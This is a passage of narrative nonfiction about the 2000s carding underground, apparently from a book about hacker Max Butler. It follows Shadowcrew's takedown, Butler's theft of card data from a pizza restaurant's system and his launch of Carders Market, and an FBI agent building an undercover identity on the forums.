CarderPlanet before anyone else could enjoy the +pleasure of taking it down. +Shadowcrew’s leaders wouldn’t be so lucky. In September, +the FBI pulled the plug on Thomas’s operation and gave +him a month to move out of his apartment—ending his war +with Cumbajohnny. The next month, on October 26, sixteen +Secret Service agents gathered in a Washington command +center to drop the hammer on Operation Firewall. Their +targets were marked on a map of the United States filling a +wall of computer displays. Every one of them would be at +home, the agents knew; at the Secret Service’s behest, +Gonzalez had called an online meeting for that evening, and +nobody said no to Cumbajohnny. +At nine p.m., agents armed with MP5 semiautomatic +assault rifles burst into Shadowcrew members’ homes +around the country, grabbing three founders, T-Mobile + +hacker Ethics, and seventeen other buyers and sellers. It +was the biggest crackdown on identity thieves in American +history. Two days later, a federal grand jury handed down a +sixty-two-count conspiracy indictment and the Justice +Department went public with Operation Firewall. +“This indictment strikes at the heart of an organization +that is alleged to have served as a one-stop marketplace +for identity theft,” Attorney General John Ashcroft boasted in +a press release. “The Department of Justice is committed +to taking on those who deal in identity theft or fraud, +whether they act online or off.” +With Gonzalez’s help, the Secret Service locked +Shadowcrew’s remaining four thousand users out of the +site and swapped in a new front page featuring a Secret +Service banner and an image of a prison cell. The new +page struck the Shadowcrew tagline, “For Those Who Like +to Play in the Shadows,” and substituted a new motto: “You +Are No Longer Anonymous!!” +Panicked carders around the around the world soaked +up the news reports and watched the television coverage, +worrying for themselves and their fallen compatriots. They +collected on a small forum called Stealth Division to assess +the damage and take a head count of survivors. “I am +scared to death for my family right now—for my children,” +wrote one cyberthief. “I just learned that my every move has +been recorded.” +Slowly, they realized that Cumbajohnny wasn’t on the list +of defendants. That’s when he logged in to make a final +appearance. +“I want everyone to know I’m on the run and I had no +fucking idea the USSS had the capabilities of doing what +they did,” Gonzalez wrote. “From the news articles I can tell +they’ve wiretapped my VPN and wiretapped the +Shadowcrew server. This is my last post, good luck +everyone.” +Nick Jacobsen, Ethics, was kept out of the press release +and quietly indicted separately in Los Angeles—his + +and quietly indicted separately in Los Angeles—his +intrusion into the Secret Service’s e-mail wouldn’t emerge +until well after the agency had collected its accolades for +Operation Firewall. Even then, the dragnet was a clear +victory for the government. CarderPlanet was shuttered, +and now Shadowcrew was closed for good, and its leaders +—save Gonzalez—were in jail. +The carders were confused, paranoid, and, for the +moment, homeless. “It will take years and years for any +message board like Shadowcrew to build up,” wrote one. +“And when or if it does, law enforcement will bust it again. +“And knowing what can be done, I doubt anyone will take +the risk of putting another one up.” + +17 + +Pizza and Plastic +n the top floor of the Post Street Towers, Max’s +computers sat on the wood-veneer floor, silent and cool. +Outside the bay window, shops and apartments were ready +to unwittingly feed him bandwidth through his oversized +antenna. +Max had gone dormant for a few months after +accumulating a pile of cash from the Citibank operation; +he’d abandoned his penthouse apartment and put his +hacking on the back burner. But he couldn’t stay away long. +He’d asked Chris to rent him a new safe house, one with +more neighborhood Wi-Fi options than the last. “I just need +a closet, I don’t need any space,” he’d said. +Chris had delivered. There was ample Wi-Fi swimming +around the Post Street Towers, and the apartment was +indeed a closet: a three-hundred-square-foot studio that +seemed scarcely larger than a prison cell. Decked out in +blond wood, with a Formica counter, a full-sized fridge, and +a bed that unfolded from the wall, it was a clean and +functional McApartment, bare of all distractions and able to +provide the necessities for Max’s all-night hacking sprees. +The high turnover in the building made him anonymous. +Chris just had to flash a fake ID at the rental office, pay a +$500 deposit, and sign the six-month lease. +Once his computers were plugged in and his antenna +was latched on to some patsy’s network, Max wasted little +time in getting back on the job. As ever, he targeted +fraudsters, and he developed some novel ways to steal +from them. He monitored the alerts put out by an +organization called the Anti-Phishing Working Group, + +staying on top of the latest phishing attacks. The alerts +included the Web addresses of the phishing sites linked to +the forged e-mails, allowing Max to hack the phishers’ +servers, resteal the stolen data, and erase the original +copy, frustrating the phishers and grabbing valuable +information at the same time. +Other attacks were less focused. Max was still plugged +into the white-hat scene, and he was on the private mailing +lists where security holes often appeared for the first time. +He had machines scanning the Internet day and night for +servers running vulnerable software, just to see what he’d +turn up. He was scanning for a Windows server-side buffer +overflow when he made the discovery that would lead to his +public entry into the carding scene. +His scanning put him inside a Windows machine that, on +closer inspection, was in the back office of a Pizza +Schmizza restaurant in Vancouver, Washington; he knew +the place, it was near his mother’s house. As he looked +around the computer, he realized the PC was acting as the +back-end system for the point-of-sale terminals at the +restaurant—it collected the day’s credit card transactions +and sent them in a single batch every night to the credit +card processor. Max found that day’s batch stored as a +plain text file, with the full magstripe of every customer card +recorded inside. +Even better, the system was still storing all the previous +batch files, dating back to when the pizza parlor had +installed the system about three years earlier. It was some +fifty thousand transactions, just sitting there, waiting for him. +Max copied the files, then deleted them—they weren’t +needed by Pizza Schmizza; in fact, just storing them in the +first place was a violation of Visa’s security standards. +After sorting and filtering out the duplicate and expired +cards, he was left with about two thousand dumps. +For the first time, Max had a primary source, and they +were virgin cards, almost guaranteed to be good. +Chris had been complaining about the staleness of some + +Chris had been complaining about the staleness of some +of Max’s dumps. That would end now. A customer could +walk into the Pizza Schmizza and order a twelve-inch pie +for his family, and his credit card could be on Max’s hard +drive while the leftovers were still cooling in the garbage. +Once he was done organizing his numbers, Max gave +Chris a taste. “These are extremely fresh,” he said. “They’re +from two days ago.” +There was no way that Chris and his crew could metabolize +the fifty dumps a day coming from the Pizza Schmizza. So +Max decided to make his first forays into vending in the +carding scene. +Chris offered to handle the sales in exchange for half the +profits. Chris’s recklessness still concerned Max—Chris +had nearly been arrested buying gold in, of all places, India, +fleeing the country one step ahead of the police. But Chris +knew too much about Max for the hacker to just cut him +loose, so he agreed to let Chris act as his representative to +the underground. Chris soon claimed success in marketing +Max’s dumps, until Max—who had a back door on Chris’s +computer—figured out that Chris was actually using the +magstripe data himself, getting a 50 percent price break by +claiming to have resold them. Economically, it was all the +same. But Max couldn’t help feeling cheated yet again. +Max turned to someone who might be easier to control: a +teenage carder from Long Island named John Giannone +who had become Chris’s sidekick. +Giannone was a smart middle-class kid with a coke habit +and burning desire to be a ruthless, badass cyberpunk. His +early ops failed to impress: He boasted to another carder +that he’d once pushed all the buttons on an elevator before +getting off, so the next passenger would have to stop at +every floor. On another occasion, he claimed, he walked +into a bank and wrote a note on the back of a deposit slip: +“This is a robbery. I have a bomb. Give me money or I’ll +blow the bank.” Then he put the slip back on the pile as a + +surprise for the next customer. +When he was seventeen, Giannone joined Shadowcrew +and CarderPlanet under the handle MarkRich, and started +participating in small operations. His reputation went south +when he was busted carding plane tickets and a rumor +spread that he’d snitched on a forum regular while in +juvenile hall. +Undaunted, Giannone paid a more established carder +for the exclusive right to take over his handle and +reputation. As “Enhance,” the teen became more bold but +not more successful. In May 2003, copying an extortion +tactic perfected by the Russians, he borrowed a hacker’s +botnet and launched a DDoS attack against JetBlue, taking +down the airline’s website for some twenty-five minutes +before sending an e-mail demanding $500,000 in +protection money. But JetBlue paid him neither cash nor +the respect a cybergangster deserved. “We will forward this +to the appropriate law enforcement agencies,” the +company wrote. “Yesterday’s outage was due to a system +upgrade.” +When Max found Giannone with his Free Amex hack, the +teen was running his operations from the computer in his +mother’s bedroom. But Max and Chris had looked over +Giannone’s files and decided he could be partner material. +Chris in particular may have seen something of himself in +the young, coke-snorting gangster wannabe. Giannone was +already a regular visitor to Orange County—he liked +vacationing in the sun—and the two began partying +together. Chris called his apprentice “the Kid.” +Max knew everything about Giannone, while Giannone +knew virtually nothing about him. For Max, it was an ideal +arrangement for a partnership. Giannone made some sales +of Max’s dumps and then introduced Max to other carders +interested in making buys over ICQ. Max set up a new +online identity for his vending: “Generous.” +Dealing with strangers was a big step for Max, and he +took elaborate precautions to stay safe. When using carder + +took elaborate precautions to stay safe. When using carder +forums or instant-messaging services, he’d bounce his +connection through his private network of hacked PCs +around the world—ensuring nobody could easily trace him +even as far as his hacked WiFi. He disguised his writing +style online for fear that some ill-considered turn of phrase +or choice of punctuation might be matched to one of Max +Vision’s security white papers or Bugtraq posts—the FBI +had once remarked on the copious ellipses in his +anonymous note to Lawrence Berkeley Laboratory during +the BIND attacks. +To collect revenue, he accepted payment through an +anonymous e-gold account linked to an ATM card. +Giannone helped him with a second remittance system. +The teenager established a business account at Bank of +America for a car repair shop called A&W Auto Clinic, then +sent Max the magstripe data and PIN code for his ATM +card, allowing Max to clone the card with his MSR206. +Dumps buyers in the United States could make a cash +deposit for A&W at their nearest Bank of America branch, +which Max could then withdraw at his leisure with his cloned +ATM card. +Max didn’t need the money the way he used to. He’d +squandered most of his nest egg from the Citibank cash- +outs, frittering it away on everything from handouts for the +homeless to a $1,500 Sony AIBO robotic dog. But he +wasn’t broke yet, and Charity had just started a well-paying +job as a system administrator at Linden Lab, the brick-and- +mortar home of Second Life—a fully realized three- +dimensional online universe growing by thousands of +inhabitants a month. +There was just one reason he was upping the ante now. +He’d become addicted to life as a professional hacker. He +loved the cat-and-mouse games, the freedom, the secret +power. Cloaked in the anonymity of his safe house, he +could indulge any impulse, explore every forbidden corridor +of the Net, satisfy every fleeting interest—all without fear of + +consequence, fettered only by the limits of his conscience. +At bottom, the master criminal was still the kid who couldn’t +resist slipping into his high school in the middle of the night +and leaving his mark. + +18 + +The Briefing +n a briefing room near Washington, two dozen male faces +filled a computer monitor on the wall, some scowling for a +mugshot, others smiling for a passport photo. A couple of +them looked like teenagers barely out of puberty; others +were older, unkempt and vaguely dangerous in +appearance. +Around the table a handful of FBI agents in suits and ties +stared back at the faces of the international computer +underground. For one of the agents, a lot of things were +suddenly making sense. +At thirty-five years old, J. Keith Mularski had been an FBI +agent for seven years. But he’d been on the computer +crime beat for just four months, and he had a lot to learn. +Enthusiastically friendly and quick to laugh, Mularski had +wanted to be an FBI agent since his freshman year at +Pennsylvania’s Westminster College, when a bureau +recruiter came in to speak to one of his classes. He’d held +on to the list of qualifications even as he walked a more +pedestrian career path, starting as a furniture salesman in +Pittsburgh, then working his way up to a position as +operations manager for a national furniture chain with fifty +employees reporting to him at four stores. +In 1997, after eight years of waiting, he finally decided he +was ready for the FBI. After a yearlong application process +and sixteen weeks of training at the FBI academy in +Quantico, he was sworn in as an agent in July 1998. +As part of the bureau’s graduation ritual, the newly +minted agent was instructed to rank all the FBI field offices +in order of assignment preference. He rated his hometown + +of Pittsburgh as number one—it was where Mularski had +grown up, gone to school, and met his wife. His chances of +transferring there evaporated the next month, when Islamic +terrorists bombed U.S. embassy buildings in Kenya and +Tanzania. Veteran FBI agents were dispatched from the +Washington, DC, field office to investigate the attacks, and +Mularski was one of fifteen fresh recruits sent to fill the +vacancies in DC—the city marked thirty-second on his list. +Almost overnight Mularski went from managing furniture +stores to working on some of the FBI’s most important, and +highly classified, investigations. When, in 1999, a listening +device was found in an office on the top floor of the State +Department’s headquarters, he was part of the team that +identified a Russian diplomat monitoring the transmitter +from outside. In 2001, he helped bring down Robert +Hanssen, a fellow counterespionage agent who’d been +secretly spying for the KGB and its successor agency for +twenty years. +It was heady work, but the secrecy chafed Mularski: He +held a top-secret clearance and couldn’t talk about his job +with outsiders—even his wife. So when headquarters +announced openings for two experienced agents to kick- +start an ambitious cybercrime initiative in Pittsburgh, he +saw a chance to go home and step out of the shadows at +the same time. +His new job wouldn’t be in an FBI office. He was +assigned to the civilian office of an industry nonprofit group +in Pittsburgh called the National Cyber Forensics and +Training Alliance. The NCFTA had been formed by banks +and Internet companies a couple of years earlier to track +and analyze the latest scams targeting consumers online— +mostly phishing attacks. Mularski’s job wouldn’t consist of +chasing individual scams—in isolation, each round of +phishing was too small to meet the FBI’s minimum loss +threshold of $100,000. Rather, he would be looking for +trends that pointed to a common culprit—a group or a +single hacker—responsible for a large number of + +single hacker—responsible for a large number of +cyberthefts. Then he’d shop the results to the various FBI +field offices and, hopefully, hand off the investigation. +It was passive intelligence gathering, meticulous but +unexciting. Mularski wasn’t in charge of the cases, and he +never got the satisfaction of putting handcuffs on a bad guy. +But for the first time in seven years, he could talk about his +work with his wife over dinner. +Now he was back in the DC area for his first briefing on +the carding scene. At the head of the room was Postal +Inspector Greg Crabb, a solidly built man with world-weary +eyes who worked in the post office’s international fraud unit. +Crabb had stumbled upon the carding underground in 2002 +while tracking a software counterfeiter with a sideline in +credit card fraud. Since then, he’d been on the ground in +twenty-five countries, working with local police to make +busts and building a massive database of raw intelligence +on the growing community: nicknames, IP addresses, +instant messages, and e-mails of more than two thousand +people. He’d become the government’s top expert on the +scene, but the enormity of his crusade now threatened to +overwhelm him. So he’d come to the FBI for help. +The briefing for about half a dozen FBI agents was held +at a nondescript Calverton, Baltimore, office where the +bureau ran its Innocent Images anti–child porn operation. +Speaking slowly in a rumbling, midwestern twang, the +postal inspector weighed each word like a parcel as he ran +through the history of the scene: CardersLibrary spawning +CarderPlanet, the legend of King Arthur, the influence of the +Russians and Ukrainians, and the rise and fall of +Shadowcrew. He threw up a screenshot of CarderPlanet to +show the underground’s structure: A site operator was the +don. Admins were capos. It was a metaphor to which the +FBI was institutionally attuned; hackers were the new mafia. +Operation Firewall, Crabb explained, had left the carders +scattered, paranoid, and disorganized. But they were +rebuilding. And unlike before, with Shadowcrew, there was + +no singular target to go after. Instead, a slew of new, +smaller forums was popping up. Crabb didn’t say it, but the +Secret Service had treated the carders with half a dose of +penicillin; the survivors were immune and plentiful. +Mularski hung on every word. In his brief time at the +NCFTA, the agent had seen patterns in the raw intelligence +bubbling up from the underground: references to +nicknames, coded messages, and forums. It made sense +now. It was the carders organizing themselves again. +When Crabb wrapped up his talk and the other agents +began to file out, Mularski approached the postal inspector +at the head of the table and extended his hand +enthusiastically. “This stuff is fascinating,” he said. “I’d love +to work with you. I’d love to partner up with you.” +Crabb was surprised by the suggestion; in his +experience, a more typical proposal from an FBI agent +might take the form “Give me all your information. Thanks, +bye.” He met with Mularski and his boss privately and gave +the agents a more thorough rundown on the carder scene. +Mularski returned to Pittsburgh, his head swimming. He’d +thought he’d left behind the world of Russian spies, double +agents, and secret identities. He’d been wrong. And the +safe, satisfying routine of his new job was about to be +shattered. + +19 + +Carders Market +ry as he might, Max couldn’t get situated on any of the +new forums sprouting in Shadowcrew’s ruins. They were all +corrupt, run by dumps vendors hostile to outside +competition. In a way, it was a blessing. He could never +really trust any of the sites; he knew all too well that the +scene was rank with cops and informants. +He finally made up his mind that if he was going to vend, +the only sensible venue would be a site he personally +controlled. Still thinking of himself as Robin Hood, he came +up with the perfect name for his own forum: Sherwood +Forest. +Chris approved of the plan—he liked the idea of vending +his counterfeit credit cards and driver’s licenses in a safe +environment—but hated the name. As an exercise in +branding, “Sherwood Forest” wasn’t going to cut it for a +criminal marketplace. The partners went back to the +drawing board, and in June 2005 Max used a fake name +and bogus address in Anaheim to register +Cardersmarket.com. +It was a critical time for Max: He was near the end of his +federal supervised release, and if he could make it until +midnight, October 10, 2005, he would be a free agent, no +longer obliged to play the role of an underemployed +computer consultant for the benefit of his probation officer. +It should have been easy enough to survive a few more +months. Besides Chris, there were only two people who +knew about Max’s double life, both Chris’s friends: Jeff +Norminton and Werner Janer, the real estate fraudster who +wrote Charity a $5,000 check that helped bootstrap Max’s + +hacking operation. +Then, in September 2005, Werner Janer got busted. +Since hooking up with Max, Chris had been dropping +Janer a few cards here and there—maybe eighty over three +years—in exchange for 10 percent of whatever Janer +netted from his in-store purchases. That month Janer asked +for another batch of two dozen cards—a money shortage +had forced him to sell the family home in Los Angeles, and +he’d moved to Westport, Connecticut, to make a new start +of it. Soon after his arrival he was robbed by a criminal +associate of nearly all the proceeds of the house sale, and +he needed an income boost to support himself and his wife +and three children. +When Chris’s FedEx arrived, Janer, an avid watch +collector, headed straight to Richard’s of Greenwich, a +men’s clothing and accessory store that kept an inventory +of high-end timepieces. Janer had quality plastic and a +matching driver’s license in his pocket, all bearing the +name Stephen Leahy. What he didn’t have was a knack for +carding. He selected not one, not two, but four Anonimo +watches, each worth between $1,000 and $3,000, and +asked the store owner to ring each of them up separately +on four different Visa cards, which he conspicuously pulled +from a deck of a dozen. Two of the hefty transactions were +declined, so Janer left with two watches worth a total of +$5,777, charged to two Bank of America cards. +A patrol car pulled over Janer about two miles away. +While the cops looked over Janer’s genuine driver’s +license and asked him if he’d been watch shopping +recently, a second cruiser drove by with the store owner in +the passenger seat. He eyed Janer and confirmed that they +had the right guy. +The cops arrested Janer and searched his car, pulling +out the watches, twenty-eight credit cards, and six +California driver’s licenses, each with a different name. +When detectives served a search warrant on his house they +found more watches and a .22-caliber Walther P22 + +found more watches and a .22-caliber Walther P22 +handgun. +The gun was bad news. Instead of a larceny charge and +a probation violation Janer was now facing a federal beef +for being a felon in possession of a firearm. Janer wasted +no time in offering to lead the feds to the source of the +counterfeit cards. In the standard arrangement for snitches, +the government agreed to let Janer “proffer” his information +under a limited grant of immunity: Nothing he said would be +used directly against him. If they found it useful—if it led to +arrests—they’d consider recommending a reduced +sentence on his gun-possession charge. +In two proffer sessions totaling nearly eight hours, Janer +spilled his guts to a local Secret Service agent and a +federal prosecutor. He told them about Chris Aragon, his +ring of cashers, and “Max the Hacker,” a six-foot-five +computer genius who’d been cracking banks from San +Francisco hotel rooms. +He didn’t know Max’s last name, he said, but he’d once +written a check to the hacker’s girlfriend for $5,000. Her +name was Charity Majors. +The Secret Service wrote up the interviews and entered +the data into the agency’s computer, but the agency never +followed up on the information, and prosecutors declined to +grant Janer any special consideration. He was sentenced +to twenty-seven months in prison. +Max Vision had dodged a bullet. Janer’s statements +sank into a giant government computer—they might as well +have been stashed in the cavernous warehouse in the final +scene of Raiders of the Lost Ark. As long as nobody had +occasion to dig them up, Max was safe. +Meanwhile, Max began the process of getting Carders +Market up and running. He had plenty of experience setting +up legitimate websites, but starting a crime site would take +special preparations. For one thing, he couldn’t just put the +Carders Market server on the floor of his safe house—that + +would make him a sitting duck. +He hacked into a Florida data center run by Affinity +Internet and installed a VMware virtual machine on one of +its servers—secreting an entire simulated computer on one +of its systems. His hidden server grabbed an unused +Internet address from Affinity’s pool of addresses. The site +would be a ghost ship, not officially owned or operated by +anyone. +Max played with different Internet forum software and +finally settled on the flexible package vBulletin. He spent +months customizing the layout and designing his own +templates for the look and feel of the site, styling it in +shades of gray and muted gold. The work felt satisfying. +For the first time in years, he was creating something +instead of stealing. It was just like setting up +Whitehats.com, except in those ways in which it was the +opposite. +Finally, on the one-year anniversary of the Operation +Firewall raids, he conjured a new name in his ever- +changing lineup of noms de guerre: Iceman. He chose the +handle in part for its commonality: There were lots of +Icemen in the underground—there’d even been one on +Shadowcrew. If law enforcement tried to track him down, +they’d find several mirages on their radar. +Max, as Iceman, launched Cardersmarket.com in late +2005 with little fanfare. Chris joined as the first +coadministrator, inventing the handle EasyLivin’ for the site. +From their careful observation of Shadowcrew and the +splinter forums that followed, Max and Chris knew that the +key to gaining acceptance was to appoint big names who +could help run the board and attract still more heavy hitters +from their circle of friends. The partners soon managed to +draw two household names from the Shadowcrew +diaspora. +Bradley Anderson, a forty-one-year-old Cincinnati +bachelor, was their first pick. Anderson was a legend as +“ncXVI,” a fake-ID expert and author of the self-published + +book Shedding Skin, the bible of identity reinvention. Their +second recruit was Brett Shannon Johnson, thirty-five, a +Charleston, South Carolina, identity thief famous online as +“Gollumfun,” a founder of both Counterfeit Library and +Shadowcrew who’d retired from the latter site before the +Secret Service swept in. +After vanishing from the scene for over a year, Johnson +was crawling out of retirement—Chris’s sidekick John +Giannone had spotted him online that spring and struck up +a conversation on ICQ, bringing him up to date on the latest +busts and gossip. +Giannone wound up selling Johnson twenty-nine of Max’s +dumps for an easy six hundred bucks, then introduced him +to Max, who sold him another five hundred cards. “I can see +that you and I are going to be doing some good business in +the future,” Johnson had told Max. +Johnson accepted Max’s and Chris’s invitation to +become an admin on Carders Market, lending the site the +experience and contacts of the only Shadowcrew +administrator to survive Operation Firewall. +Giannone joined Carders Market as “Zebra,” and Max +created a second, secret identity for himself, “Digits.” The +alternate handle was a keystone in Max’s new business +strategy. Shadowcrew had fallen because prosecutors +proved that the founders were themselves buying, selling, +and using stolen data—running an informational website +wasn’t, in and of itself, illegal, Max reasoned. So Iceman +would be the public face of Carders Market but would never +buy or sell stolen data. Digits, his alter ego, would handle +that, vending the dumps Max was siphoning from the +Vancouver pizza joint to anyone who could afford them. +To complete his vision for the site, Max needed one +more admin with a particular qualification: a command of +the Russian language. He wanted to repair the rift that +Operation Firewall had torn between Eastern European +carders and their Western counterparts. Two Russian + +Shadowcrew members had fallen into Cumbajohnny’s VPN +trap, and the whole affair had left the Russians deeply +suspicious of English-speaking forums. +Max resolved that Carders Market would distinguish itself +by having an Eastern European section moderated by a +native Russian speaker. He just needed to find one. +Chris offered to help out, and Max accepted. If there was +one thing that Chris had proven to his partner, it was that he +knew how to recruit new talent. + +20 + +The Starlight Room +ine chandeliers hung over the lush velvet booths at +Harry Denton’s Starlight Room, the light scattering off a +two-hundred-pound mirror ball suspended over the dance +floor. Heavy crimson drapes parted from the picture +windows like a stage, revealing the glimmering San +Francisco skyline beyond. +Positioned on the twenty-first floor of the Sir Francis +Drake Hotel, the Starlight Room was an opulent fixture in +the city’s teeming nightlife—a flashback to 1930s style, +strewn with deep red and gold damask and hand-rubbed +silk. More garish than hip, the club kept people coming by +hosting regular theme nights. This was Russian +Wednesday, and tuxedoed servers were pouring vodka +shots at the crowded bar while music from the motherland +spilled over the crowd. +In the ladies’ room, Tsengeltsetseg Tsetsendelger was +being kissed. Tipsy from a night out, the young Mongolian +immigrant wasn’t sure how it happened, or why, but a pretty +five-foot-four girl with tumbling brown hair had decided to +kiss her. Then Tsengeltsetseg blinked. There was another, +identical woman beside her. +Michelle and Liz introduced themselves, and a wide, +unaffected pumpkin smile crept onto Tsengeltsetseg’s +face. She told the Esquere twins that they could call her +“Tea.” +Tea was a regular at Russian Night and fluent in both +Russian and English. Born in northern Mongolia at a time +when the country was still under Soviet influence, she’d +learned Russian in school—until the Soviet empire + +collapsed and Mongolia’s prime minister declared English +the landlocked nation’s official second language. +Looking for adventure and the proverbial better way of +life, she won a student visa and emigrated to the United +States in 2001. Her first thought upon landing at Los +Angeles International Airport that summer was that +Americans were awfully fat, but when she got out into the +city she was more impressed; she enjoyed beautiful +people, and L.A. was filled with them. +After one semester at a community college in Torrance, +she moved to the Bay Area and got her green card. Now +she was attending classes at Peralta College in Oakland, +paying her rent and tuition by dishing ice cream at Fenton’s +Creamery. +Liz seemed strangely delighted to learn that Tea spoke +Russian. The twins bought her a drink and then suggested +they continue the party with some friends at their hotel four +blocks away. It was after midnight when they got to Chris +Aragon’s suite at the luxe Clift Hotel near Union Square. +Chris was relaxing there; Tea was struck at once by how +handsome he was. He seemed interested in her as well, +particularly after the twins mentioned that Tea knew +Russian. Joined by two of Chris’s female employees, they +opened some booze and hung out until the small hours of +the morning, when the girls all left to go to their own rooms +and Tea crashed in Chris’s for the night. +She was still shaking off sleep the next morning when the +room became a hive of activity. Liz and a handful of other +attractive young women—all alert and cleanly scrubbed +after their night of partying—began popping in and out, +receiving envelopes and cryptic instructions from Chris.* +They came and went all day, picking up more envelopes, +dropping off department store shopping bags, sometimes +lingering for a time before departing again. The party +atmosphere hung in the air, but there was a nervous, +excited edge to it now that made Tea curious—but not so +curious as to pry. + +curious as to pry. +When the sun had set and the gang had gathered back +at the suite, Tea said her good-byes; she had to go home +to the East Bay, to be at work at the ice-cream parlor in the +morning. +Chris had a better idea. He was starting a website with a +business partner—“Sam”—and they happened to be in +need of a full-time Russian translator. It would pay better +than spooning out Coffee Cookie Dream to yuppies all day. +“Don’t go,” said Liz. “You’ll make more money with us.” +Tea looked over her pretty new friends. They reminded +her of the New Russians who had emerged following the +collapse of the Soviet regime, flush with suspiciously +acquired wealth, consuming with more hunger than taste. +She liked Chris, though—he seemed different. And an +Internet translating job would grant her the freedom and +flexibility to focus on her college studies. She said yes. +The next day, Chris packed up his team for the next leg in +their travels, a road trip to Vegas. Tea, he said, should +meet them there for more fun. He told her to get a Yahoo! e- +mail account, and he’d send her flight information once +they’d arrived. +Back in her apartment, the whole adventure felt like a +strange dream. But the next day, Tea had a confirmation +number for her prepaid flight to Las Vegas in her Yahoo! in- +box. She packed a bag and headed to the airport. +Chris relocated Tea to his own neighborhood and paid for +her to rent an apartment in her real name in Dana Point, a +coastal town in southern Orange County. At the end of a +quiet, winding cul-de-sac, painted an Umbrian orange with +Spanish tiles combing the roof, the “Tea House,” as he +dubbed it, was a world away from the Mongolian city where +Tea grew up. +They made love on her new bed, and afterward, Chris left +$40 on the nightstand so she could get her nails done. +Tea’s feelings were hurt. She wasn’t a hooker. She was + +falling in love. +Chris and his team moved his card-printing gear from +Villa Siena into the Dana Point apartment’s attached +garage—the Tea House would be his new plant and party +house, as well as the base of operations for Tea’s twenty- +four-hour-a-day job on Carders Market. Her task would be +to haunt the Eastern European carder forums, like +Mazafaka and Cardingworld, and summarize what was +happening there for the Russian section of Carders Market. +She’d need a “nick,” Chris explained, a handle or +nickname for her online alter-ego. She decided on +“Alenka,” the name of a Russian candy. +Alenka went to work at once, glued to the monitor at the +Tea House day and night, doing her best to lure the high- +powered Russians onto the site run by Chris and “Sam,” +the Whiz. +* Liz was one of Chris Aragon’s cashers, but there’s no +evidence that her sister Michelle was involved. + +21 + +Master Splyntr +aking up one floor of a lime-green office building on the +bank of the Monongahela River, the National Cyber +Forensics and Training Alliance was far removed from the +cloistered secrecy of Washington’s intelligence community, +where Mularski had cut his teeth. Here, dozens of security +experts from banks and technology companies worked +alongside students from nearby Carnegie Mellon University +in a cluster of neat cubicles, surrounded by a ring of offices +that followed the smoked-glass walls around the building. +With Aeron chairs and dry-erase boards, the office had the +feel of one of the technology companies that provided the +NCFTA with the bulk of its funds. The FBI had made a few +changes before moving in, transforming one office into an +electronic communications room, packed with government- +approved computer and crypto gear to securely +communicate with Washington. +In his office, Mularski looked over a “linkchart” Crabb, the +postal inspector, had e-mailed him—a massive +organization schematic showing the disparate connections +among 125 hard targets in the underground. Mularski +realized he’d been going about it all wrong by waiting for a +crime, then working to track it back to the culprit. The +criminals weren’t hiding at all. They were advertising their +services on the forums. That made them vulnerable, in the +same way the New York and Chicago Mafia’s rituals and +strict hierarchy had given the FBI a roadmap to crack down +on the mob decades before. +All he had to do now was join the carders. +He selected a forum from a list provided by Crabb and + +clicked on the account registration link. Under Justice +Department regulations, Mularski could infiltrate the forums +without approval from Washington, provided he observed +strict limits on his activities. To maintain his cover, he could +post messages to the forum bulletin boards, but he couldn’t +engage anyone directly; he would be permitted no more +than three “substantive contacts” with any other forum +member. Participating in crimes, or making controlled buys +from a vendor, was out of the question. It could be an +intelligence-gathering operation only; he would be a +sponge, soaking up information about his adversaries. +As soon as he connected, he was confronted with his +first important strategic decision: What would his hacker +handle be? Mularski went with his gut. Inspired by the +Saturday morning cartoon Teenage Mutant Ninja Turtles, +the agent settled on the moniker of the sewer-dwelling +karate champs’ rodent sensei, a biped rat called Master +Splinter. For uniqueness, and a hackerish timbre, he +spelled his surname without major vowels. +So in July 2005, Master Splyntr signed up for his first +crime forum, CarderPortal, laughing to himself over the +poetry in assuming the name of an underground rat. +Mularski was soon playing the carder forums like a +chessboard, drawing on the NCFTA’s stream of scam data +for his opening moves. +The center was plugged directly into the antifraud efforts +at banks and e-commerce sites, so when a new criminal +innovation showed up, Mularski knew about it. He posted +about the schemes on CarderPortal, portraying them as his +own inventions. The experienced crooks marveled at the +newcomer who’d independently reinvented their newest +tricks. And when the scams eventually became public in the +press, the newbies remembered they’d heard it first from +Master Splyntr. +In the meantime, the FBI agent was soaking up the + +history of the forums while honing his prose to affect the +cynical, profanity-laced style of the underground. +After a few months, Mularski faced the first challenge to +his intelligence-gathering operation. The initial crop of +forums that grew from the detritus of Shadowcrew had +been wide open to new members—spooked by Operation +Firewall, many scammers had adopted new handles, and +without reputations to trade on there’d been no way for +carders to vet one another. Now that was changing. A new +breed of “vouched” forums was emerging. The only way to +get on them was to win the sponsorship of two existing +members. Constrained by the Justice Department’s +guidelines, Mularski had deliberately avoided forming +direct relationships in the underground. Who would vouch +for him? +Borrowing a page from a Robert Ludlum novel, Mularski +decided Master Splyntr needed a background legend that +could propel him into the new crime boards. His thoughts +turned to a Europe-based antispam organization called +Spamhaus that he’d worked with as part of previous FBI +initiatives. +Founded in 1998 by a former musician, Spamhaus +charts the ever-changing lineup of Internet addresses +spewing garbage into consumers’ in-boxes; its database of +spam sources is used by two-thirds of the world’s ISPs as +a blacklist. Of more interest to Mularski was the +organization’s public most-wanted list of notorious +spammers. Peopled by the likes of Alan “Spam King” +Ralsky and the Russian Leo “BadCow” Kuvayev, the +Registry of Known Spam Operations, or ROKSO, is +second only to a federal grand jury indictment on the list of +places an Internet scammer doesn’t want to see his name. +Mularski phoned up founder Steve Linford in Monaco to +explain his scheme: He wanted to be on ROKSO—or, at +least, he wanted Master Splyntr there. Linford agreed, and +Mularski went to work crafting his background story. The + +best lies hew to the truth, so Mularski decided to make +Splyntr a Polish spammer. Mularski was descended on his +father’s side from Polish immigrants—his bureau-issue +button-down concealed a tattoo on his left arm of the Orzel +Bialy, the white eagle with golden beak and talons that +adorns Poland’s coat of arms. Mularski would locate +Master Splyntr in Warsaw; he’d visited Poland’s capital and +could roughly describe its landmarks if pressed. +In August, the ROKSO listing went live, for the first time +stapling a “real” name to Mularski’s cartoon-inspired alter +ego. +Pavel Kaminski aka “Master Splyntr” runs a loosely +organized spam and scam crew from Eastern Europe. +Possibly a BadCow affiliate. He is linked to: proxy +spam; phishing; pump’n’dump; javascript exploits; +carder forums; botnets. +The profile included samples of scammy spam +messages supposedly sent out by “Pavel Kaminski,” +handcrafted by Spamhaus, and an analysis of his hosting +arrangements. +Now the carders who Googled Master Splyntr could see +for themselves that he was the real deal, a bona fide +Eastern European cybercrook with sticky fingers in a lot of +pies. When Mularski logged on to CarderPortal, he found +business proposals waiting in his in-box from crooks +hoping to partner with him. Still not allowed to engage any +suspects, he blew them off sneeringly. +You’re not much of a player, he’d write back. 